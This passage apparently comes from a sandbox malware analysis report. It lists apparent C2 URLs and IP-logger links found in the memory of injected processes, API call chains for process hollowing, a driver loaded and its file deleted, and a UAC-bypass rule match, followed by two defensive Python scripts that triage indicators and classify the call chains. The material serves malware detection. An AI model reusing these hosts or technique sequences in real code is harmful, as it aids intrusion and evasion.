                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/003/01/d1c
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/003/01/d1o
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/003/01/d1x
                    Source: UZPt0hR.exe, 00000000.00000002.1217110910.0000000000475000.00000004.00000001.01000000.00000003.sdmp, svchost.exe, 00000005.00000002.2447729139.000002684C4D3000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2447224015.000002684AABE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2447729139.000002684C4CF000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2446684624.000002684AA64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.174.192.179/clean
                    Source: UZPt0hR.exe, 00000000.00000002.1217110910.0000000000475000.00000004.00000001.01000000.00000003.sdmp, svchost.exe, 00000005.00000002.2447729139.000002684C4D3000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2447224015.000002684AABE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2447729139.000002684C4CF000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2445459264.000000E655D76000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2446684624.000002684AA64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.174.192.179/data/003
                    Source: tzutil.exe, 0000000F.00000003.1457083520.0000000002D3D000.00000004.00000020.00020000.00000000.sdmp, K47ZW3T_7928.sys.15.dr | String found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
                    Source: tzutil.exe, 0000000F.00000003.1457083520.0000000002D3D000.00000004.00000020.00020000.00000000.sdmp, K47ZW3T_7928.sys.15.dr | String found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
                    Source: powershell.exe, 00000013.00000002.1484701780.00000201C4912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1562304976.000001D911861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: tzutil.exe, 0000000F.00000003.1457083520.0000000002D3D000.00000004.00000020.00020000.00000000.sdmp, K47ZW3T_7928.sys.15.dr | String found in binary or memory: http://ocsp.thawte.com0
                    Source: powershell.exe, 00000015.00000002.1508687218.000001D901A18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000013.00000002.1451660217.00000201B4AC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1508687218.000001D901A18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000013.00000002.1451660217.00000201B48A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1508687218.000001D9017F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000013.00000002.1451660217.00000201B4AC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1508687218.000001D901A18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000015.00000002.1508687218.000001D901A18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000015.00000002.1575045533.000001D919F5C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1574238992.000001D919E75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 00000013.00000002.1451660217.00000201B48A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1508687218.000001D9017F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000015.00000002.1562304976.000001D911861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000015.00000002.1562304976.000001D911861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000015.00000002.1562304976.000001D911861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: tzutil.exe, tzutil.exe, 0000000F.00000002.1476857053.0000000140010000.00000004.00000001.01000000.00000007.sdmp, tzutil.exe, 0000000F.00000002.1475891130.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, w32tm.exe, w32tm.exe, 00000012.00000002.1503322850.0000000140075000.00000002.00000001.01000000.00000008.sdmp | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                    Source: tzutil.exe, w32tm.exe | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
                    Source: w32tm.exe, 00000012.00000003.1478137297.000000000044C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://devbuilds.s.kaspersky-l
                    Source: w32tm.exe, 00000012.00000003.1478137297.000000000044C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://devbuilds.s.kaspersky-l)ky
                    Source: w32tm.exe, 00000012.00000003.1455611296.0000000002539000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/fu
                    Source: w32tm.exe, 00000012.00000002.1503322850.0000000140075000.00000002.00000001.01000000.00000008.sdmp | String found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
                    Source: w32tm.exe, 00000012.00000003.1460867803.0000000002521000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe/q
                    Source: w32tm.exe, 00000012.00000003.1460867803.0000000002521000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exed
                    Source: w32tm.exe, 00000012.00000002.1502716547.0000000002520000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exeindows
                    Source: powershell.exe, 00000015.00000002.1508687218.000001D901A18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000013.00000002.1492884123.00000201CCC23000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.co
                    Source: tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/U7WLGD
                    Source: UZPt0hR.exe, 00000000.00000002.1217110910.0000000000475000.00000004.00000001.01000000.00000003.sdmp, svchost.exe, 00000005.00000002.2447729139.000002684C4D3000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2447224015.000002684AABE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2447729139.000002684C4CF000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2446684624.000002684AA64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/ZATFQO
                    Source: svchost.exe, 00000005.00000002.2446834017.000002684AA82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/images/pixel.png
                    Source: powershell.exe, 00000013.00000002.1484701780.00000201C4912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1562304976.000001D911861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknown | Network traffic detected: HTTP traffic on port 443, seen in both directions (local port -> 443 and 443 -> local port) for 71 local ports: 49694, 49695, 49698, 49699, 49700, 49702, 49704, 49736, 49741, 49742, 49747, 49752, 49757, 49762, 49767, 49772, 49777, 49782-49788, 49790, 49792-49800, 49802-49838
                    Source: unknown | HTTPS traffic detected: 104.26.9.202:443 -> 192.168.2.6:49695 version: TLS 1.2
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C482310 WaitForSingleObject,RtlExitUserThread,GetAsyncKeyState,Sleep,OpenEventW,SetEvent,CloseHandle,RtlExitUserThread
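
The URL strings listed above mix real indicators with library noise and with memory-scrape damage: truncated prefixes such as https://devbuilds.s.kaspersky-l and over-runs such as KVRT.exed and KVRT.exeindows, where bytes that happened to follow the URL in memory were read as part of it. The Python script below is an added triage example; it is not part of the Joe Sandbox report and not code from the sample. It parses rows in the report's own "Source: ... String found in binary or memory: ..." layout, drops a noise list of URL prefixes that PowerShell, .NET and libcurl embed in every process (that list, and the rule that a string ending in a known file extension is a complete URL, are the editor's assumptions, not statements from the report), validates the hostname, collapses truncated and over-run variants onto the one complete URL, and keeps the set of processes each indicator was found in. The sample input is constructed from the rows above with the memory-region identifiers shortened.

```python
import re
from typing import Dict, Set
from urllib.parse import urlsplit

# Constructed input: the "String found in binary or memory" rows from the report section
# above, with each Source field shortened to the process name and one memory-region id.
SAMPLE = """\
Source: powershell.exe, 00000013.00000002.1451660217.sdmp, powershell.exe, 00000015.00000002.1508687218.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000015.00000002.1562304976.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.1562304976.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.1562304976.sdmpString found in binary or memory: https://contoso.com/License
Source: tzutil.exe, w32tm.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: w32tm.exe, 00000012.00000003.1478137297.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-l
Source: w32tm.exe, 00000012.00000003.1478137297.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-l)ky
Source: w32tm.exe, 00000012.00000003.1455611296.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/fu
Source: w32tm.exe, 00000012.00000002.1503322850.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
Source: w32tm.exe, 00000012.00000003.1460867803.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe/q
Source: w32tm.exe, 00000012.00000003.1460867803.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exed
Source: w32tm.exe, 00000012.00000002.1502716547.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exeindows
Source: powershell.exe, 00000015.00000002.1508687218.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000013.00000002.1492884123.sdmpString found in binary or memory: https://go.microsoft.co
Source: tzutil.exe, 0000000F.00000002.1476752101.sdmpString found in binary or memory: https://grabify.link/U7WLGD
Source: UZPt0hR.exe, 00000000.00000002.1217110910.sdmp, svchost.exe, 00000005.00000002.2447729139.sdmpString found in binary or memory: https://grabify.link/ZATFQO
Source: svchost.exe, 00000005.00000002.2446834017.sdmpString found in binary or memory: https://grabify.link/images/pixel.png
Source: powershell.exe, 00000013.00000002.1484701780.sdmp, powershell.exe, 00000015.00000002.1562304976.sdmpString found in binary or memory: https://nuget.org/nuget.exe
"""

LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*String found in binary or memory:\s*(?P<url>\S+)\s*$"
)

# Analyst assumption, not something the report states: URL prefixes that PowerShell,
# .NET and libcurl embed in every process, so they carry no signal for this sample.
NOISE_PREFIXES = (
    "https://aka.ms/", "https://contoso.com/", "https://curl.haxx.se/",
    "https://github.com/Pester/", "https://go.microsoft.co", "https://nuget.org/",
)
# Hostname: dotted labels plus an alphabetic TLD. Rejects scrape damage such as
# "kaspersky-l)ky" and the cut-off host "kaspersky-l".
HOST_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,}$")
# Assumption: a string ending in one of these is a complete URL, so longer strings that
# merely extend it ("KVRT.exed", "KVRT.exeindows") are bytes that followed it in memory.
COMPLETE_EXT = (".exe", ".dll", ".sys", ".zip", ".png", ".html", ".txt")


def processes(src: str) -> Set[str]:
    """Process names from a Source field ("name.exe, <region id>, name.exe, ...")."""
    return {t.strip() for t in src.split(",") if t.strip().lower().endswith(".exe")}


def valid_host(url: str) -> bool:
    return bool(HOST_RE.match(urlsplit(url).netloc.lower()))


def is_complete(url: str) -> bool:
    return urlsplit(url).path.lower().endswith(COMPLETE_EXT)


def collapse(cands: Dict[str, Set[str]]) -> Dict[str, Set[str]]:
    """Drop truncated prefixes and over-run extensions, keep the complete URL, and
    merge the sources of every dropped variant into the URL it is a variant of."""
    urls = sorted(cands)
    keep: Dict[str, Set[str]] = {}
    for u in urls:
        truncated = not is_complete(u) and any(o != u and o.startswith(u) for o in urls)
        overrun = any(o != u and u.startswith(o) and is_complete(o) for o in urls)
        if not (truncated or overrun):
            keep[u] = set(cands[u])
    for u in urls:
        if u in keep:
            continue
        for k in keep:
            if k.startswith(u) or u.startswith(k):
                keep[k] |= cands[u]
    return keep


def extract_iocs(text: str) -> Dict[str, Set[str]]:
    """URL -> set of processes whose memory held it, after noise removal and collapsing."""
    cands: Dict[str, Set[str]] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        url = m["url"]
        if url.startswith(NOISE_PREFIXES) or not valid_host(url):
            continue
        cands.setdefault(url, set()).update(processes(m["src"]))
    return collapse(cands)


if __name__ == "__main__":
    for url, procs in sorted(extract_iocs(SAMPLE).items()):
        print(f"{url}  <-  {', '.join(sorted(procs))}")
```

Run as a script it reduces the eighteen rows to four indicators: the three grabify.link URLs and the single KVRT.exe download URL, each with the processes whose memory contained it (the KVRT variants all fold into w32tm.exe). The prefix rules are deliberately conservative: a URL that is a prefix of another is only dropped when it does not itself look complete, so a short path such as /U7WLGD survives unless a longer scrape variant of it appears.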

                    System Summary

                    Source: 5.2.svchost.exe.2684c470000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.UZPt0hR.exe.95bfd8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.UZPt0hR.exe.95bfd8.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.UZPt0hR.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_00411449 NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_00491A07 CreateEventW,GetModuleHandle64,GetProcAddress64,X64Call,ResetEvent,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_00411600 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_00411AE0 CreateEventW,GetModuleHandle64,GetProcAddress64,X64Call,WaitForSingleObject,ResetEvent,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,ResetEvent,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_00406DB0 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,_memset,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C4811A4 CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C480740 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C477940 GetCurrentProcess,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,TerminateProcess
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_007D5D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | File created: C:\Windows\Temp\K47ZW3T_7928.sys
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | File deleted: C:\Windows\Temp\K47ZW3T_7928.sys
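
The call chains above give the order of operations for two behaviours the report flags. In UZPt0hR.exe and the svchost.exe payload, a new process is created, the payload is staged through NtCreateSection and a pair of NtMapViewOfSection calls (one view in the injector, one in the target), and execution is started either by GetThreadContext/SetThreadContext/ResumeThread or by RtlCreateUserThread. In tzutil.exe, AdjustTokenPrivileges is followed by a service key written with RegCreateKeyA/RegSetValueExA and then NtLoadDriver, and the .sys under C:\Windows\Temp is created and deleted around it, so the file is gone by the time a scan runs. The Python script below is an added example, not part of the report and not code from the sample: it parses "Code function" rows in the report's layout and classifies each function by ordered-subsequence matching against API patterns. The patterns are the editor's abstraction of the chains above (the privilege name and the registry key path are not shown in the report and are not assumed here). The sample input is taken from the rows above with repeated calls removed (the relative order of the remaining calls is the report's), and the tzutil.exe row is kept in the report's raw form, with the trailing duplicate function id, to show the parser strips it.

```python
import re
from typing import Dict, List, Tuple

# Constructed input: "Code function" rows from the report section above with repeated
# calls removed. The last row is kept in the report's raw layout (no separator, trailing
# duplicate function id) so the parser is exercised on both forms.
SAMPLE = r"""
Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_00411600 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_00406DB0 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,_memset,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtClose,CloseHandle,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C480740 CreateProcessW,GetModuleHandleW,GetProcAddress,GetCurrentProcess,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,LoadLibraryW,lstrcpyW,lstrcpyA,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtClose,TerminateProcess,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C477940 GetCurrentProcess,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtClose,CloseHandle,TerminateProcess,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C4811A4 CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007D5D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey,15_2_007D5D7C
"""

# Accepts both "Source: X | Code function: ..." and the raw fused "Source: XCode function: ...".
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*\|?\s*Code function:\s*(?P<fid>\S+)\s+(?P<calls>.+?)\s*$"
)

# Editor's abstraction of the chains in the report: the minimum ordered set of calls
# that distinguishes each behaviour. Most specific first; the first match wins.
PATTERNS: List[Tuple[str, List[str]]] = [
    ("section-mapped payload started by thread-context hijack",
     ["CreateProcessW", "NtCreateSection", "NtMapViewOfSection", "NtMapViewOfSection",
      "SetThreadContext", "ResumeThread"]),
    ("section-mapped payload started by RtlCreateUserThread",
     ["CreateProcessW", "NtCreateSection", "NtMapViewOfSection", "NtMapViewOfSection",
      "RtlCreateUserThread"]),
    ("driver load via NtLoadDriver after writing a service key",
     ["AdjustTokenPrivileges", "RegCreateKeyA", "RegSetValueExA", "NtLoadDriver"]),
    ("section mapping only (staging; no execution primitive in this function)",
     ["NtCreateSection", "NtMapViewOfSection", "NtMapViewOfSection"]),
]
NO_MATCH = "no injection or driver-load pattern"


def is_subsequence(pattern: List[str], calls: List[str]) -> bool:
    """True if every call in `pattern` occurs in `calls` in that order (gaps allowed)."""
    remaining = iter(calls)
    return all(any(call == wanted for call in remaining) for wanted in pattern)


def parse(text: str) -> Dict[str, Tuple[str, List[str]]]:
    """Map function id -> (source binary, ordered call list)."""
    out: Dict[str, Tuple[str, List[str]]] = {}
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        fid, raw = m["fid"], m["calls"]
        if raw.endswith(fid):          # raw report rows repeat the id after the list
            raw = raw[: -len(fid)]
        out[fid] = (m["src"], [c for c in raw.split(",") if c])
    return out


def classify(calls: List[str]) -> str:
    for label, pattern in PATTERNS:
        if is_subsequence(pattern, calls):
            return label
    return NO_MATCH


def analyze(text: str) -> Dict[str, str]:
    """Map function id -> behaviour label for every parsable row."""
    return {fid: classify(calls) for fid, (_, calls) in parse(text).items()}


if __name__ == "__main__":
    parsed = parse(SAMPLE)
    for fid, label in analyze(SAMPLE).items():
        print(f"{parsed[fid][0]}  {fid}: {label}")
```

Ordered-subsequence matching is what makes this usable on static call lists: the pattern says nothing about how many unrelated calls sit between NtMapViewOfSection and SetThreadContext, only that the execution primitive comes after the mapping. The two NtMapViewOfSection entries in the injection patterns encode the local-plus-remote view pair; a function with a single mapping is reported as staging only, and pure cleanup functions such as 5_2_000002684C4811A4 fall through to no match.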
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code functions: 0_2_0040E1C8, 0_2_004258F7
                    Source: C:\Windows\System32\svchost.exe | Code functions: 5_2_000002684C492340, 5_2_000002684C489D20, 5_2_000002684C474DA0, 5_2_000002684C495E50, 5_2_000002684C48D600, 5_2_000002684C477EF0, 5_2_000002684C471000, 5_2_000002684C49E9BC, 5_2_000002684C4812B0, 5_2_000002684C4A3B2C, 5_2_000002684C4923B6, 5_2_000002684C49CC2C, 5_2_000002684C4A5C5C, 5_2_000002684C47CBF0, 5_2_000002684C4A53F8, 5_2_000002684C48C480, 5_2_000002684C48AD50, 5_2_000002684C48C501, 5_2_000002684C48A510, 5_2_000002684C499D1C, 5_2_000002684C47DE20, 5_2_000002684C482690, 5_2_000002684C480740, 5_2_000002684C4A6708, 5_2_000002684C492790, 5_2_000002684C48D030, 5_2_000002684C47B8B0, 5_2_000002684C47E8C0, 5_2_000002684C47A8C0, 5_2_000002684C477940, 5_2_000002684C49F964
